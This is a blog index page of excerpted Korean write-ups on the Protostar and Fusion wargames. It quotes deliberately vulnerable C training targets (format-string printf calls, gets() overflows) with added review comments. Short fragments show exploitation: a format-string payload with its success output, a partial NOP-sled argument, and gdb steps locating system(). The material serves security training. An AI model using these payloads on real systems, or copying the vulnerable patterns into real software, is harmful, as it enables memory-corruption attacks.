Exploit-Exercise
-
format4 | Exploit-Exercise | 2016. 8. 18. 00:41
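/*
 * format4 -- deliberately vulnerable training target quoted by the post.
 *
 * Listing repair: the gutter numbers and the four #include operands were
 * mangled when the page was extracted. The headers below are the ones the
 * code needs (printf/fgets, exit, _exit); <string.h> fills the fourth
 * slot -- confirm against the exercise source.
 *
 * Defect class on display: CWE-134, externally controlled format string.
 */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/* Declared but never read or written by the code shown. */
int target;

/* Success marker: no call to this function exists anywhere in the listing. */
void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

/* Reads one line from stdin (bounded by sizeof(buffer)) and echoes it. */
void vuln()
{
  char buffer[512];

  /* Bounded read; the return value is not checked, so on EOF/error the
   * buffer contents are indeterminate when printed below. */
  fgets(buffer, sizeof(buffer), stdin);

  /*
   * REVIEW: the input line is passed as the format string, so any
   * conversion specifier the user types is interpreted by printf.
   * Outside a training target this call must be
   *     printf("%s", buffer);   or   fputs(buffer, stdout);
   * GCC/Clang report it with -Wformat -Wformat-security. It is left
   * unchanged here because the exercise depends on it.
   */
  printf(buffer);

  exit(1);
}

int main(int argc, char **argv)
{
  vuln();
}

/*
 * Text that followed the listing in the post excerpt (kept verbatim; the
 * index page cuts it off):
 * 그냥 hello함수를 호출해주면된다. 하지만 vuln함수에서 exit(1);을 호출한다. 근데 뭐 상관없다. exit..
 */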
-
format3 | Exploit-Exercise | 2016. 8. 18. 00:32
12345678910111213141516171819202122232425262728293031#include #include #include #include int target; void printbuffer(char *string){ printf(string);} void vuln(){ char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printbuffer(buffer); if(target == 0x01025544) { printf("you have modified the target :)\n"); } else { printf("target is %08x :(\n", target); }} int main(int argc, char **argv){ vu..
-
format2 | Exploit-Exercise | 2016. 8. 18. 00:25
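/*
 * format2 -- deliberately vulnerable training target quoted by the post.
 *
 * Listing repair: the gutter numbers and the four #include operands were
 * mangled when the page was extracted. The headers below are the ones the
 * code needs (printf/fgets); the remaining slots are filled with the
 * usual <stdlib.h>/<unistd.h>/<string.h> -- confirm against the exercise
 * source.
 *
 * Defect class on display: CWE-134, externally controlled format string.
 */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/* Global with static storage (starts at 0); no statement in the listing
 * assigns to it. */
int target;

/* Reads one line from stdin, echoes it, then reports the value of target. */
void vuln()
{
  char buffer[512];

  /* Bounded read; return value unchecked. */
  fgets(buffer, sizeof(buffer), stdin);

  /*
   * REVIEW: user input used as the format string. printf will act on
   * any conversion specifier in the line, including ones that store
   * through a pointer argument. The safe form is printf("%s", buffer)
   * or fputs(buffer, stdout); -Wformat -Wformat-security flags this
   * call. Left unchanged because the exercise depends on it.
   */
  printf(buffer);

  /* Since the program never assigns target, reaching the first branch
   * means memory was modified through the call above. */
  if(target == 64) {
    printf("you have modified the target :)\n");
  } else {
    printf("target is %d :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}

/*
 * Text that followed the listing in the post excerpt (kept verbatim; the
 * index page cuts it off):
 * 입력값받고, 간단하게 전역변수인 target을 64로 바꾸면되는문제다. 값이..
 */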
-
format1 | Exploit-Exercise | 2016. 8. 18. 00:19
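/*
 * format1 -- deliberately vulnerable training target quoted by the post.
 *
 * Listing repair: the four #include operands were lost when the page was
 * extracted. <stdio.h> is the one the code needs; the other three slots
 * are filled with the usual <stdlib.h>/<unistd.h>/<string.h> -- confirm
 * against the exercise source.
 *
 * Defect class on display: CWE-134, externally controlled format string.
 */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/* Global with static storage (starts at 0); no statement in the listing
 * assigns to it. */
int target;

/*
 * Prints `string` and reports whether target has become non-zero.
 *
 * string: text to print; main passes argv[1] unmodified.
 */
void vuln(char *string)
{
  /*
   * REVIEW: a caller-supplied string is used as the format string, so
   * conversion specifiers inside it are interpreted by printf. The safe
   * form is printf("%s", string) or fputs(string, stdout);
   * -Wformat -Wformat-security flags this call. Left unchanged because
   * the exercise depends on it.
   */
  printf(string);

  /* target is never assigned by the program, so a non-zero value here
   * means memory was modified through the call above. */
  if(target) {
    printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  /* argv[1] is NULL when the program is started without an argument;
   * nothing checks argc before the pointer is handed to printf. */
  vuln(argv[1]);
}

/*
 * Text that followed the listing in the post excerpt (kept verbatim; the
 * index page cuts it off):
 * 134번이나 하면 내가 입력해준 AAAA가 출력된다. 그럼 처음에 target 전역변수 주소를 구해서 넣어주면되겠다. root@ubuntu:/home/study# ./fsb1 $(python -c 'print "\x28\xa0\x04\x08%111x%134$n"')( 2fyou have modified the target :) root@ubuntu..
 */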
-
Fusion Level 1 | Exploit-Exercise | 2016. 7. 12. 23:52
#include "../common/common.c" int fix_path(char *path) { char resolved[128]; if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open strcpy(path, resolved); } char *parse_http_request() { char buffer[1024]; char *path; char *q; // printf("[debug] buffer is at 0x%08x :-)\n", buffer); :D if(read(0, buffer, sizeof(buffer))
-
format0 | Exploit-Exercise | 2015. 12. 8. 23:32
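/*
 * Author's note that preceded the listing (kept verbatim):
 * buffer[64] + target(4) 존재 .
 *
 * format0 -- deliberately vulnerable training target quoted by the post.
 *
 * Listing repair: the four #include operands were lost when the page was
 * extracted. <stdio.h> is the one the code needs; the other three slots
 * are filled with the usual <stdlib.h>/<unistd.h>/<string.h> -- confirm
 * against the exercise source.
 *
 * Defect classes on display: CWE-134 (externally controlled format
 * string) and CWE-121 (stack-based buffer overflow).
 */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/*
 * Formats `string` into a 64-byte stack buffer and reports whether the
 * neighbouring local `target` ended up holding 0xdeadbeef.
 *
 * string: used directly as the sprintf format; main passes argv[1].
 */
void vuln(char *string)
{
  /* volatile forces the comparison below to re-read the variable from
   * memory instead of assuming it still holds 0. */
  volatile int target;
  char buffer[64];

  target = 0;

  /*
   * REVIEW: two independent defects in one call.
   *  - sprintf takes no destination size, so output longer than 63
   *    characters is written past the end of buffer.
   *  - the caller's string is the format, so width and conversion
   *    specifiers inside it control how much output is produced.
   * The bounded, fixed-format replacement is
   *     snprintf(buffer, sizeof buffer, "%s", string);
   * Left unchanged because the exercise depends on it.
   */
  sprintf(buffer, string);

  /* target is only ever assigned 0, so this branch is reachable solely
   * through the out-of-bounds write above. */
  if(target == 0xdeadbeef) {
    printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)
{
  /* argv[1] is NULL when no argument is given; argc is not checked. */
  vuln(argv[1]);
}

/*
 * Text that followed the listing in the post excerpt (kept verbatim; the
 * index page cuts it off):
 * root@s0ngsari-virtual-machine:~/Desktop/study/protostar/format# ./format0 $(python -c 'print "\x90"*6..
 */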
-
stack7 | Exploit-Exercise | 2015. 12. 8. 23:23
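/*
 * stack7 -- deliberately vulnerable training target quoted by the post.
 *
 * Listing repair: the four #include operands were lost when the page was
 * extracted. The headers below are the ones the code needs (printf/gets,
 * _exit, strdup); <stdlib.h> fills the fourth slot -- confirm against the
 * exercise source.
 *
 * Defect class on display: CWE-121, stack-based buffer overflow via gets().
 */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/*
 * Prompts for a path, reads it into a 64-byte stack buffer and returns a
 * heap copy made with strdup (the caller owns it; main discards it).
 */
char *getpath()
{
  char buffer[64];
  /* Holds the return address as an integer: assumes 32-bit pointers, as
   * on the exercise image presumably; on an LP64 build the value would
   * be truncated. */
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  /*
   * REVIEW: gets() has no length argument and was removed from the
   * language in C11; any line longer than 63 bytes is written past the
   * end of buffer. The bounded replacement is
   *     fgets(buffer, sizeof buffer, stdin);
   * Left unchanged because the exercise depends on it.
   */
  gets(buffer);

  ret = __builtin_return_address(0);

  /*
   * REVIEW: this check runs after the unbounded read and only rejects
   * return addresses whose top bits match 0xb0000000. It is an address
   * filter, not a bounds check: it neither prevents the overwrite nor
   * covers other address ranges. Bounded input, a stack protector
   * (-fstack-protector-strong) and a non-executable stack are the
   * controls that address this class.
   */
  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();
}

/*
 * Text that followed the listing in the post excerpt (kept verbatim; the
 * index page cuts it off):
 * 그저 0xb..... 로시작하는 오프셋만 아니면된다..
 */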
-
stack6 | Exploit-Exercise | 2015. 12. 8. 23:17
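/*
 * stack6 -- deliberately vulnerable training target quoted by the post.
 *
 * Listing repair: the four #include operands were lost when the page was
 * extracted. The headers below are the ones the code needs (printf/gets,
 * _exit); <stdlib.h> and <string.h> fill the remaining slots -- confirm
 * against the exercise source.
 *
 * Defect class on display: CWE-121, stack-based buffer overflow via gets().
 */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/* Prompts for a path, reads it into a 64-byte stack buffer and echoes it. */
void getpath()
{
  char buffer[64];
  /* Holds the return address as an integer: assumes 32-bit pointers, as
   * on the exercise image presumably; on an LP64 build the value would
   * be truncated. */
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  /*
   * REVIEW: gets() has no length argument and was removed from the
   * language in C11; any line longer than 63 bytes is written past the
   * end of buffer. The bounded replacement is
   *     fgets(buffer, sizeof buffer, stdin);
   * Left unchanged because the exercise depends on it.
   */
  gets(buffer);

  ret = __builtin_return_address(0);

  /*
   * REVIEW: this check runs after the unbounded read and only rejects
   * return addresses whose top byte matches 0xbf000000. It is an
   * address filter, not a bounds check: it neither prevents the
   * overwrite nor covers any other address range. Bounded input, a
   * stack protector (-fstack-protector-strong) and address-space
   * randomisation are the controls that address this class.
   */
  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();
}

/*
 * Text that followed the listing in the post excerpt (kept verbatim; the
 * index page cuts it off):
 * (gdb) p system$1 = {} 0x4007c190 (gdb) find &system,..
 */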